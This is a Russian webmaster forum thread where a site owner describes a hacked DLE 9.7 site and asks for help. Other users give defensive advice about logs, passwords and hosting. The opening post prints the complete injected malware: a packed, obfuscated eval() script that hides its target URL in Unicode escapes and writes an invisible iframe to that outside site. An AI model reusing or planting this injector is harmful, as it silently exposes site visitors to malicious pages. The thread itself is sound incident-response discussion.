Взлом DLE 9.7. Нуждаюсь в ваших размышлениях.

12
[Удален]
3272

Доброго времени суток. Имеется сайт на dle 9.7 лицензия. Уже два раза заливают шелл, но в последний раз сам файл от рутовского пользователя. Вставляют код на сайт такого плана:


<script type="text/javascript">
var domain = "\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u002d\u0079\u0061\u002e\u0072\u0075\u002f\u0073\u0065\u0061\u0072\u0063\u0068\u002f\u003f\u0054\u0072\u0075\u0065";
var checkFalsh = true;

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 h(a){2 b=0;2 c=0;2 d=0;2 e=3.4;v(b<=e.9){c=b;d=c+a.9;5(e.k(c,d)==a){c=d+1;d=3.4.y(";",c);5(d<c)d=3.4.9;6 3.4.k(c,d);G}b++}6""}7 o(a,b,c){2 d=C K;2 e="";d.O(d.A()+c*Q*m*m*I);e=d.E();3.4=a+"="+b+";S="+e}7 q(){5(!M)6 i;2 a=8.g&&8.g["p/x-t-u"]?8.g["p/x-t-u"].w:0;5(a.N!=F)6 i;l 6 B}f=J(f);2 R=3.4;5(h("j")=="r"){}l{5(q()){o("j","r",1);3.z(\'<s H="\'+f+\'" P="U" W="D" T="X" Z="L" Y = "n" V = "n"></s>\')}}',62,62,'||var|document|cookie|if|return|function|navigator|length||||||domain|mimeTypes|findCookie|true|ffsesidd|substring|else|60|1px|addCookie|application|checkFalshEnabled|d04840f88bc33d58fcfd975b86591f91|iframe|shockwave|flash|while|enabledPlugin||indexOf|write|getTime|false|new|auto|toGMTString|undefined|break|src|1e3|unescape|Date|center|checkFalsh|description|setTime|name|24|szCookieString|expires|frameborder|yandex|width|scrolling|no|height|align'.split('|'),0,{}));
</script>

В первый раз запихнули сие чудо в js, в последний не заморачивались и прям в main.tpl вставили.

Подскажите кто знает возможно ли залить файл и присвоить ему другого пользователя? Может весь хостинг взломали? Не слышал что-то дырок в 9.7 версии... (понятно что они будут всегда в DLE)

Сейчас естественно поменял все пароли, очистил сайт от шеллов и ограничил доступ к серверу по айпишнику, поможет ли это избавиться от проблемы?

K5
На сайте с 21.07.2010
Offline
209
#1

куда прописали, в шаблон или???

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
[Удален]
#2

В первый раз запихнули сие чудо в js, в последний не заморачивались и прям в main.tpl вставили.

K5
На сайте с 21.07.2010
Offline
209
#3

хостинг чей?

какой фтп клиент?

Милованов Ю.С
На сайте с 24.01.2008
Offline
196
#4

Это юзали?

Проверьте, расскажИте о результатах.

Если не найдет, надо будет логи смотреть.

Да, бывает, ломают весь хостинг(админы тоже лобками бывают).

Подпись))
[Удален]
#5

Айболита юзал, он как раз шелл не нашёл а ругался на файлы движка. Сам шелл нашёл через встроенный антивирус.

Милованов Ю.С
На сайте с 24.01.2008
Offline
196
#6

Надо зырить логи, там скорей всего возможно найдеться ответ на вопрос - "откуда шелл"

W
На сайте с 10.05.2009
Offline
114
#7
Сашко:
Доброго времени суток. Имеется сайт на dle 9.7 лицензия. Уже два раза заливают шелл, но в последний раз сам файл от рутовского пользователя.

То что залили от рутовского пользователя очень плохой звоночек, или у вас дырявый скрипт работает под рутом, что маловероятно или ушли пароли рута налево (вирусы на компе или брут ftp/ssh)

Если сайт один то менять пароли и закрывать от записи все лишние папки и скрипты. Насчет дыр DLE, я не подскажу, давно не пользуюсь этой цмс, очень часто ломали особенно старые версии, эпический баг 8.2 который при востановлении пароля не проверял хеш высланый в письме до сих пор забыть не могу, поэтому нечего посоветовать не могу, единственное что если есть еще сайты на сервере то стоит проверить и их и отключить phpmyadmin либо сменить его адрес, он тоже может быть уязвим.

siv1987
На сайте с 02.04.2009
Offline
427
#8

Сашко, с хостингом как? Соседи, соседние сайты на аккаунте? Логи не смотрели? Пароли от фтп, бд меняли, они не могли утечь?

[Удален]
#9

Вот кстати заскриншотил на что ругался касперский

[ATTACH]116288[/ATTACH]

Сам домен cb-host.ru на стадии создания, заранее пиарят его что ли? :)

Иду логи изучать...

jpg kasper.jpg
[Удален]
#10
siv1987:
Сашко, с хостингом как? Соседи, соседние сайты на аккаунте? Логи не смотрели? Пароли от фтп, бд меняли, они не могли утечь?

Соседние сайты изначально были разнесены по разным аккуантам в целях безопасности и не заражены, пароли в браузерах и в клиентах ftp никогда не сохранаю. Всё бы хорошо и вопросов бы не было по поводу шеллов (это же dle), но смутило что у него рутовский пользователь на сервере.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий